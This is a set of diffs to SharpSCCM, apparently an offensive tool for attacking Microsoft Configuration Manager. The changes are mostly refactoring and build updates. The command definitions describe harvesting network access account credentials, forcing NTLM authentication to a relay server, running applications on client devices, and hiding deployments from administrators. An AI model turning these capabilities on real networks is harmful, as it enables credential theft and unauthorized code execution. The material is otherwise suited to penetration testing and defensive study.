@@ -213,7 +213,7 @@ namespace SharpSCCM
                 getCommand.Add(getDeployment);
                 getDeployment.Add(new Option<string>(new[] { "--name", "-n" }, "A string to search for in deployment names (returns all deployments where the name contains the provided string"));
                 getDeployment.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose, string name) =>
+                    (string server, string siteCode, bool count, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose, string name) =>
                     {
                         if (!string.IsNullOrEmpty(name))
                         {
@@ -223,7 +223,7 @@ namespace SharpSCCM
                         {
                             properties = new[] { "ApplicationName", "AssignedCI_UniqueID", "AssignedCIs", "AssignmentName", "CollectionName", "Enabled", "EnforcementDeadline", "LastModificationTime", "LastModifiedBy", "NotifyUser", "SourceSite", "TargetCollectionID", "UserUIExperience" };
                         }
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtUtil.GetClassInstances(wmiConnection, "SMS_ApplicationAssignment", count, properties, whereCondition, orderBy, dryRun, verbose);
                     });
 
@@ -233,7 +233,7 @@ namespace SharpSCCM
                 getDevice.Add(new Option<string>(new[] { "--last-user", "-u" }, "Get information on devices where a specific user was the last to log in (matches exact string provided) (note: output reflects the last user logon at the point in time the last heartbeat DDR and hardware inventory was sent to the management point and may not be accurate)"));
                 getDevice.Add(new Option<string>(new[] { "--name", "-n" }, "A string to search for in device names (returns all devices where the device name contains the provided string)"));
                 getDevice.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, bool dryRun, string orderBy, string[] properties, string whereCondition, bool verbose, string lastUser, string name) =>
+                    (string server, string siteCode, bool count, bool dryRun, string orderBy, string[] properties, string whereCondition, bool verbose, string lastUser, string name) =>
                     {
                         if (!string.IsNullOrEmpty(lastUser))
                         {
@@ -247,36 +247,32 @@ namespace SharpSCCM
                         {
                             properties = new[] { "Active", "ADSiteName", "Client", "DistinguishedName", "FullDomainName", "HardwareID", "IPAddresses", "IPSubnets", "IPv6Addresses", "IPv6Prefixes", "IsVirtualMachine", "LastLogonTimestamp", "LastLogonUserDomain", "LastLogonUserName", "MACAddresses", "Name", "NetbiosName", "Obsolete", "OperatingSystemNameandVersion", "PrimaryGroupID", "ResourceDomainORWorkgroup", "ResourceNames", "SID", "SMSInstalledSites", "SMSUniqueIdentifier", "SNMPCommunityName", "SystemContainerName", "SystemGroupName", "SystemOUName" };
                         }
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtUtil.GetClassInstances(wmiConnection, "SMS_R_System", count, properties, whereCondition, orderBy, dryRun, verbose);
                     });
 
                 // get naa
-                var getNetworkAccessAccounts = new Command("naa", "Get network access accounts and passwords from the server policy");
+                var getNetworkAccessAccounts = new Command("naa", "Request the machine policy from a management point to obtain network access account credentials");
                 getCommand.Add(getNetworkAccessAccounts);
-                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--password", "-p" }, "The password for the specified machine account"));
-                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--computer", "-c" }, "The name of the computer account to register a new device record for"));
-                getNetworkAccessAccounts.Add(new Argument<string>("method", "(computer|cert) Use either a computer account and password or the local client authentication certificate for authentication to the management point (cert method requires local Administrator privileges)"));
+                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--output-file", "-o" }, "The path where the policy XML will be written to"));
+
+                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--password", "-p" }, "The password for the specified computer account"));
+                getNetworkAccessAccounts.Add(new Option<string>(new[] { "--username", "-u" }, "The name of the computer account to register a new device record for, including the trailing \"$\""));
                 getNetworkAccessAccounts.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string method, string computer, string password) =>
+                    (string server, string siteCode, string username, string password, string outputFile) =>
                     {
-                        if (server == null || sitecode == null)
+                        if (server == null || siteCode == null)
                         {
-                            (server, sitecode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
+                            (server, siteCode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
                         }
-
-                        if (method != "computer" && method != "cert")
+                        
+                        if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))
                         {
-                            Console.WriteLine("[!] The method argument must be set to a value of \"computer\" or \"cert\"");
+                            Console.WriteLine("[!] A computer account name (-u) and password (-p) must be specified for this method");
                         }
-
-                        //else if (method == "computer" && (string.IsNullOrEmpty(computer) || string.IsNullOrEmpty(password)))
-                        //{
-                        //    Console.WriteLine("[!] A computer account name (-m) and password (-p) must be specified for this method");
-                        //}
                         else
                         {
-                            MgmtPointMessaging.GetNetworkAccessAccounts(server, sitecode, method, computer, password);
+                            MgmtPointMessaging.GetNetworkAccessAccounts(server, siteCode, username, password, outputFile);
                         }
                     });
 
@@ -286,7 +282,7 @@ namespace SharpSCCM
                 getPrimaryUser.Add(new Option<string>(new[] { "--device", "-d" }, "A specific device to search for (returns the device matching the exact string provided)"));
                 getPrimaryUser.Add(new Option<string>(new[] { "--user", "-u" }, "A specific user to search for (returns all devices where the primary user name contains the provided string)"));
                 getPrimaryUser.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool count, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose, string device, string user) =>
+                    (string server, string siteCode, bool count, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose, string device, string user) =>
                     {
                         if (!string.IsNullOrEmpty(device))
                         {
@@ -300,7 +296,7 @@ namespace SharpSCCM
                         {
                             verbose = true;
                         }
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         // Don't get lazy props for this function. ResourceName won't populate.
                         MgmtUtil.GetClassInstances(wmiConnection, "SMS_UserMachineRelationship", count, properties, whereCondition, orderBy, dryRun, verbose, false); 
                     });
@@ -309,15 +305,15 @@ namespace SharpSCCM
                 var getSitePushSettings = new Command("site-push-settings", "Query the specified management point for automatic client push installation settings (requires Full Administrator access)");
                 getCommand.Add(getSitePushSettings);
                 getSitePushSettings.Handler = CommandHandler.Create(
-                    (string server, string sitecode) =>
+                    (string server, string siteCode) =>
                     {
-                        MgmtPointWmi.GetSitePushSettings(server, sitecode);
+                        MgmtPointWmi.GetSitePushSettings(server, siteCode);
                     });
 
                 // invoke
                 var invokeCommand = new Command("invoke", "A group of commands that execute actions on the server");
                 invokeCommand.AddGlobalOption(new Option<string>(new[] { "--server", "-mp" }, "The IP address, FQDN, or NetBIOS name of the Configuration Manager management point server to connect to (default: the current management point of the client running SharpSCCM)"));
-                invokeCommand.AddGlobalOption(new Option<string>(new[] { "--sitecode", "-sc" }, "The three character site code of the Configuration Manager server (e.g., PS1) (default: the sitecode of the client running SharpSCCM)"));
+                invokeCommand.AddGlobalOption(new Option<string>(new[] { "--site-code", "-sc" }, "The three character site code of the Configuration Manager server (e.g., PS1) (default: the site code of the client running SharpSCCM)"));
                 rootCommand.Add(invokeCommand);
 
                 // invoke client-push
@@ -326,21 +322,21 @@ namespace SharpSCCM
                 invokeClientPush.Add(new Option<bool>(new[] { "--as-admin", "-a" }, "Connect to the server via WMI rather than HTTP to force authentication (requires Full Administrator access)"));
                 invokeClientPush.Add(new Option<string>(new[] { "--target", "-t" }, "The NetBIOS name, IP address, or if WebClient is enabled on the site server, the IP address and port (e.g., 192.168.1.1@8080) of the relay/capture server (default: the machine running SharpSCCM)"));
                 invokeClientPush.Handler = CommandHandler.Create(
-                    (string server, string sitecode, bool asAdmin, string target) =>
+                    (string server, string siteCode, bool asAdmin, string target) =>
                     {
-                        if (server == null || sitecode == null)
+                        if (server == null || siteCode == null)
                         {
-                            (server, sitecode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
+                            (server, siteCode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
                         }
                         if (!asAdmin)
                         {
                             MessageCertificateX509 certificate = MgmtPointMessaging.CreateUserCertificate();
-                            SmsClientId clientId = MgmtPointMessaging.RegisterClient(certificate, target, server, sitecode);
-                            MgmtPointMessaging.SendDDR(certificate, target, server, sitecode, clientId);
+                            SmsClientId clientId = MgmtPointMessaging.RegisterClient(certificate, target, server, siteCode);
+                            MgmtPointMessaging.SendDDR(certificate, target, server, siteCode, clientId);
                         }
                         else
                         {
-                            MgmtPointWmi.GenerateCCR(target, server, sitecode);
+                            MgmtPointWmi.GenerateCCR(target, server, siteCode);
                         }
                     });
 
@@ -348,11 +344,11 @@ namespace SharpSCCM
                 var invokeQuery = new Command("query", "Execute a given WQL query");
                 invokeCommand.Add(invokeQuery);
                 invokeQuery.Add(new Argument<string>("query", "The WQL query to execute"));
-                invokeQuery.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\") (default: \"root\\SMS\\site_<sitecode>\")"));
+                invokeQuery.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\") (default: \"root\\SMS\\site_<site-code>\")"));
                 invokeQuery.Handler = CommandHandler.Create(
-                    (string server, string wmiNamespace, string sitecode, string query) =>
+                    (string server, string wmiNamespace, string siteCode, string query) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, wmiNamespace, siteCode);
                         MgmtUtil.InvokeQuery(wmiConnection, query);
                     });
 
@@ -361,9 +357,9 @@ namespace SharpSCCM
                 invokeCommand.Add(invokeUpdate);
                 invokeUpdate.Add(new Argument<string>("collection", "The name of the collection to force to update"));
                 invokeUpdate.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string collection) =>
+                    (string server, string siteCode, string collection) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.InvokeUpdate(wmiConnection, collection);
                     });
 
@@ -495,9 +491,9 @@ namespace SharpSCCM
                 newApplication.Add(new Option<bool>(new[] { "--run-as-user", "-r" }, "Run the application in the context of the logged on user (default: SYSTEM)"));
                 newApplication.Add(new Option<bool>(new[] { "--stealth", "-s" }, "Hide the application from the Configuration Manager console"));
                 newApplication.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string name, string path, bool runAsUser, bool stealth) =>
+                    (string server, string siteCode, string name, string path, bool runAsUser, bool stealth) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.NewApplication(wmiConnection, name, path, runAsUser, stealth);
                     });
 
@@ -508,9 +504,9 @@ namespace SharpSCCM
                 newCollection.Add(new Argument<string>("collection-type", "The type of collection to create, 'device' or 'user'"));
                 newCollection.Add(new Argument<string>("collection-name", "The name you would like your collection to be called"));
                 newCollection.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string collectionType, string collectionName) =>
+                    (string server, string siteCode, string collectionType, string collectionName) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.NewCollection(wmiConnection, collectionType, collectionName);
                     });
 
@@ -520,9 +516,9 @@ namespace SharpSCCM
                 newDeployment.Add(new Argument<string>("application", "The name of the application you would like to deploy"));
                 newDeployment.Add(new Argument<string>("collection", "The name of the collection you would like to deploy the application to"));
                 newDeployment.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string name, string application, string collection) =>
+                    (string server, string siteCode, string name, string application, string collection) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         MgmtPointWmi.NewDeployment(wmiConnection, application, collection);
                     });
 
@@ -535,9 +531,9 @@ namespace SharpSCCM
                 removeCommand.Add(removeApplication);
                 removeApplication.Add(new Argument<string>("name", "The exact name (LocalizedDisplayName) of the application to delete"));
                 removeApplication.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string name) =>
+                    (string server, string siteCode, string name) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         Cleanup.RemoveApplication(wmiConnection, name);
                     });
 
@@ -546,9 +542,9 @@ namespace SharpSCCM
                 removeCommand.Add(removeCollection);
                 removeCollection.Add(new Argument<string>("name", "The exact name (Name) of the collection"));
                 removeCollection.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string name) =>
+                    (string server, string siteCode, string name) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         Cleanup.RemoveCollection(wmiConnection, name);
                     });
 
@@ -558,9 +554,9 @@ namespace SharpSCCM
                 removeDeployment.Add(new Argument<string>("application", "The exact name (ApplicationName) of the application deployed"));
                 removeDeployment.Add(new Argument<string>("collection", "The exact name (CollectionName) of the collection the application was deployed to"));
                 removeDeployment.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string application, string collection) =>
+                    (string server, string siteCode, string application, string collection) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         Cleanup.RemoveDeployment(wmiConnection, application, collection);
                     });
 
@@ -569,9 +565,9 @@ namespace SharpSCCM
                 removeCommand.Add(removeDevice);
                 removeDevice.Add(new Argument<string>("guid", "The GUID of the device to remove (e.g., \"GUID:AB424B0D-F582-4020-AA26-71D32EA07683\""));
                 removeDevice.Handler = CommandHandler.Create(
-                    (string server, string sitecode, string guid) =>
+                    (string server, string siteCode, string guid) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, sitecode);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection(server, null, siteCode);
                         Cleanup.RemoveDevice(wmiConnection, guid);
                     });
 

--- a/Program.cs
+++ b/Program.cs
@@ -4,6 +4,7 @@ using System.CommandLine;
 using System.CommandLine.Builder;
 using System.CommandLine.NamingConventionBinder;
 using System.CommandLine.Parsing;
+using System.Diagnostics;
 using System.Management;
 using System.Reflection;
 
@@ -14,9 +15,12 @@ namespace SharpSCCM
         static void Main(string[] args)
         {
             bool debug = false;
+            ConsoleTraceListener consoleTracer = new ConsoleTraceListener();
             if (args.Contains(new[] { "--debug" }))
             {
                 debug = true;
+                MessagingTrace.TraceSwitch.Level = TraceLevel.Verbose;
+                Trace.Listeners.Add(consoleTracer);
             }
             try
             {
@@ -586,8 +590,17 @@ namespace SharpSCCM
                    .Build();
                 commandLine.Invoke(args);
 
-                if (System.Diagnostics.Debugger.IsAttached)
+                if (Debugger.IsAttached)
                     Console.ReadLine();
+                
+                if (debug)
+                {
+                    // Flush any pending trace messages, remove the console trace listener from the collection, and close the console trace listener.
+                    Trace.Flush();
+                    Trace.Listeners.Remove(consoleTracer);
+                    consoleTracer.Close();
+                    Trace.Close();
+                }
             }
             catch (Exception error)
             {

--- a/Program.cs
+++ b/Program.cs
@@ -40,6 +40,8 @@ namespace SharpSCCM
 
                 // add
                 var addCommand = new Command("add", "A group of commands that add objects to other objects (e.g., add device to collection)");
+                addCommand.AddGlobalOption(new Option<string>(new[] { "--server", "-mp" }, "The IP address, FQDN, or NetBIOS name of the Configuration Manager management point server to connect to (default: the current management point of the client running SharpSCCM)"));
+                addCommand.AddGlobalOption(new Option<string>(new[] { "--site-code", "-sc" }, "The three character site code of the Configuration Manager server (e.g., PS1) (default: the site code of the client running SharpSCCM)"));
                 rootCommand.Add(addCommand);
 
                 // add device-to-collection
@@ -55,9 +57,9 @@ namespace SharpSCCM
                     });
 
                 // add user-to-admins
-                var addUserToAdmins = new Command("user-to-admins", "Add a user to the RBAC_Admins table to obtain Full Administrator access to ConfigMgr console and WMI objects (requires local Administrator privileges on the server running the site database)");
-                addCommand.Add(addUserToAdmins);
-                addUserToAdmins.Add(new Argument<string>("user-name", "The domain and user name you would like to grant Full Administrator privilege to (e.g., DOMAIN-SHORTNAME\\USERNAME)"));
+                //var addUserToAdmins = new Command("user-to-admins", "Add a user to the RBAC_Admins table to obtain Full Administrator access to ConfigMgr console and WMI objects (requires local Administrator privileges on the server running the site database)");
+                //addCommand.Add(addUserToAdmins);
+                //addUserToAdmins.Add(new Argument<string>("user-name", "The domain and user name you would like to grant Full Administrator privilege to (e.g., DOMAIN-SHORTNAME\\USERNAME)"));
                 //addUserToAdmins.Handler = CommandHandler.Create(
                 //    (string server, string siteCode, string userName) =>
                 //    {
@@ -80,8 +82,8 @@ namespace SharpSCCM
                 // exec command
                 var execCommand = new Command("exec", "Execute an application from a specified UNC path or request NTLM authentication from a client device or collection of client devices (requires Full Administrator or Application Administrator access)");
                 rootCommand.Add(execCommand);
-                execCommand.Add(new Option<string>(new[] { "--device", "-d" }, "The ResourceName of the device you would like to receive NTLM authentication from"));
-                execCommand.Add(new Option<string>(new[] { "--collection", "-c" }, "The Name of the device collection you would like to receive NTLM authentication from"));
+                execCommand.Add(new Option<string>(new[] { "--device", "-d" }, "The ResourceName of the device you would like to execute an application on or receive NTLM authentication from"));
+                execCommand.Add(new Option<string>(new[] { "--collection", "-c" }, "The Name of the device collection you would like to execute an application on or receive NTLM authentication from"));
                 execCommand.Add(new Option<string>(new[] { "--path", "-p" }, "The local or UNC path of the binary/script the application will execute (e.g., \"C:\\Windows\\System32\\calc.exe\", \"\\\\site-server.domain.com\\Sources$\\my.exe\")"));
                 execCommand.Add(new Option<string>(new[] { "--relay-server", "-r" }, "The NetBIOS name, IP address, or if WebClient is enabled on the targeted client device, the IP address and port (e.g., 192.168.1.1@8080) of the relay/capture server (default: the machine running SharpSCCM)"));
                 execCommand.Add(new Option<bool>(new[] { "--run-as-system", "-s" }, "Execute code or request NTLM authentication from the specified device's machine account (default: execute as the logged on user)"));
@@ -130,7 +132,7 @@ namespace SharpSCCM
                 // get classes
                 var getClasses = new Command("classes", "Get information on remote WMI classes");
                 getCommand.Add(getClasses);
-                getClasses.Add(new Argument<string>("wmiNamespace", "The WMI namespace to query (e.g., \"root\\CCM\")"));
+                getClasses.Add(new Option<string>(new[] { "--wmi-namespace", "-ns" }, "The WMI namespace to query (e.g., \"root\\CCM\")"));
                 getClasses.Handler = CommandHandler.Create(
                     (string server, string siteCode, string wmiNamespace, bool count, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
                     {
@@ -319,7 +321,7 @@ namespace SharpSCCM
                 // invoke client-push
                 var invokeClientPush = new Command("client-push", "Force the server to authenticate to an arbitrary destination via NTLM (requires automatic client push installation to be enabled and NTLM fallback to not be disabled)");
                 invokeCommand.Add(invokeClientPush);
-                invokeClientPush.Add(new Option<bool>(new[] { "--as-admin", "-a" }, "Connect to the server via WMI rather than HTTP to force authentication (requires Full Administrator access)"));
+                invokeClientPush.Add(new Option<bool>(new[] { "--as-admin", "-a" }, "Connect to the server via WMI rather than HTTP to force authentication (requires Full Administrator access and device record for target)"));
                 invokeClientPush.Add(new Option<string>(new[] { "--target", "-t" }, "The NetBIOS name, IP address, or if WebClient is enabled on the site server, the IP address and port (e.g., 192.168.1.1@8080) of the relay/capture server (default: the machine running SharpSCCM)"));
                 invokeClientPush.Handler = CommandHandler.Create(
                     (string server, string siteCode, bool asAdmin, string target) =>
@@ -407,7 +409,7 @@ namespace SharpSCCM
                     }));
 
                 // local create-ccr
-                var localCreateCCR = new Command("create-ccr", "Create a CCR that initiates client push installation to a specified target (requires local Administrator privileges on a management point, only works on ConfigMgr 2003 and 2007)");
+                var localCreateCCR = new Command("create-ccr", "Untested function to create a CCR that initiates client push installation to a specified target (requires local Administrator privileges on a management point, only works on ConfigMgr 2003 and 2007)");
                 localCommand.Add(localCreateCCR);
                 localCreateCCR.Add(new Argument<string>("target", "The NetBIOS name, IP address, or if WebClient is enabled on the site server, the IP address and port (e.g., 192.168.1.1@8080) of the relay/capture server"));
                 localCreateCCR.Handler = CommandHandler.Create(

--- a/Properties/AssemblyInfo.cs
+++ b/Properties/AssemblyInfo.cs
@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
 // You can specify all the values or you can default the Build and Revision Numbers
 // by using the '*' as shown below:
 // [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.0.0.0")]
-[assembly: AssemblyFileVersion("1.0.0.0")]
+[assembly: AssemblyVersion("1.1.0.0")]
+[assembly: AssemblyFileVersion("1.1.0.0")]

--- a/SharpSCCM.csproj
+++ b/SharpSCCM.csproj
@@ -57,6 +57,9 @@
     <Prefer32Bit>true</Prefer32Bit>
   </PropertyGroup>
   <ItemGroup>
+    <Reference Include="Microsoft.Bcl.AsyncInterfaces, Version=1.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>packages\Microsoft.Bcl.AsyncInterfaces.1.1.0\lib\net461\Microsoft.Bcl.AsyncInterfaces.dll</HintPath>
+    </Reference>
     <Reference Include="Microsoft.ConfigurationManagement.Messaging">
       <HintPath>.\Microsoft.ConfigurationManagement.Messaging.dll</HintPath>
     </Reference>
@@ -82,14 +85,21 @@
     <Reference Include="System.Numerics.Vectors, Version=4.1.4.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
       <HintPath>packages\System.Numerics.Vectors.4.5.0\lib\net46\System.Numerics.Vectors.dll</HintPath>
     </Reference>
-    <Reference Include="System.Runtime.CompilerServices.Unsafe, Version=4.0.4.1, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
-      <HintPath>packages\System.Runtime.CompilerServices.Unsafe.4.5.3\lib\net461\System.Runtime.CompilerServices.Unsafe.dll</HintPath>
+    <Reference Include="System.Runtime.CompilerServices.Unsafe, Version=4.0.6.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>packages\System.Runtime.CompilerServices.Unsafe.4.7.1\lib\net461\System.Runtime.CompilerServices.Unsafe.dll</HintPath>
     </Reference>
     <Reference Include="System.Security" />
-    <Reference Include="System.ValueTuple, Version=4.0.1.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
-      <HintPath>packages\System.ValueTuple.4.3.0\lib\netstandard1.0\System.ValueTuple.dll</HintPath>
-      <Private>True</Private>
-      <Private>True</Private>
+    <Reference Include="System.Text.Encodings.Web, Version=4.0.5.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>packages\System.Text.Encodings.Web.4.7.1\lib\net461\System.Text.Encodings.Web.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Text.Json, Version=4.0.1.2, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>packages\System.Text.Json.4.7.2\lib\net461\System.Text.Json.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Threading.Tasks.Extensions, Version=4.2.0.1, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>packages\System.Threading.Tasks.Extensions.4.5.4\lib\net461\System.Threading.Tasks.Extensions.dll</HintPath>
+    </Reference>
+    <Reference Include="System.ValueTuple, Version=4.0.3.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>packages\System.ValueTuple.4.5.0\lib\net47\System.ValueTuple.dll</HintPath>
     </Reference>
     <Reference Include="System.Xml.Linq" />
     <Reference Include="System.Data.DataSetExtensions" />

--- a/SharpSCCM.sln
+++ b/SharpSCCM.sln
@@ -5,16 +5,42 @@ VisualStudioVersion = 16.0.32106.194
 MinimumVisualStudioVersion = 10.0.40219.1
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSCCM", "SharpSCCM.csproj", "{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}"
 EndProject
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UnitTests", "UnitTests\UnitTests.csproj", "{03652836-898E-4A9F-B781-B7D86E750F60}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
 		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|Any CPU = Release|Any CPU
 		Release|x64 = Release|x64
+		Release|x86 = Release|x86
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Debug|Any CPU.Build.0 = Debug|Any CPU
 		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Debug|x64.ActiveCfg = Debug|x64
 		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Debug|x64.Build.0 = Debug|x64
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Debug|x86.ActiveCfg = Debug|Any CPU
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Debug|x86.Build.0 = Debug|Any CPU
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Release|Any CPU.Build.0 = Release|Any CPU
 		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Release|x64.ActiveCfg = Release|x64
 		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Release|x64.Build.0 = Release|x64
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Release|x86.ActiveCfg = Release|Any CPU
+		{E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23}.Release|x86.Build.0 = Release|Any CPU
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Debug|x64.ActiveCfg = Debug|x64
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Debug|x64.Build.0 = Debug|x64
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Debug|x86.ActiveCfg = Debug|x86
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Debug|x86.Build.0 = Debug|x86
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|Any CPU.Build.0 = Release|Any CPU
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x64.ActiveCfg = Release|x64
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x64.Build.0 = Release|x64
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x86.ActiveCfg = Release|x86
+		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x86.Build.0 = Release|x86
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

--- a/SharpSCCM.sln
+++ b/SharpSCCM.sln
@@ -7,6 +7,8 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSCCM", "SharpSCCM.cspr
 EndProject
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UnitTests", "UnitTests\UnitTests.csproj", "{03652836-898E-4A9F-B781-B7D86E750F60}"
 EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DeobfuscateNAAString", "DeobfuscateNAAString\DeobfuscateNAAString.vcxproj", "{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Any CPU = Debug|Any CPU
@@ -41,6 +43,16 @@ Global
 		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x64.Build.0 = Release|x64
 		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x86.ActiveCfg = Release|x86
 		{03652836-898E-4A9F-B781-B7D86E750F60}.Release|x86.Build.0 = Release|x86
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Debug|Any CPU.ActiveCfg = Debug|Win32
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Debug|x64.ActiveCfg = Debug|x64
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Debug|x64.Build.0 = Debug|x64
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Debug|x86.ActiveCfg = Debug|Win32
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Debug|x86.Build.0 = Debug|Win32
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Release|Any CPU.ActiveCfg = Release|Win32
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Release|x64.ActiveCfg = Release|x64
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Release|x64.Build.0 = Release|x64
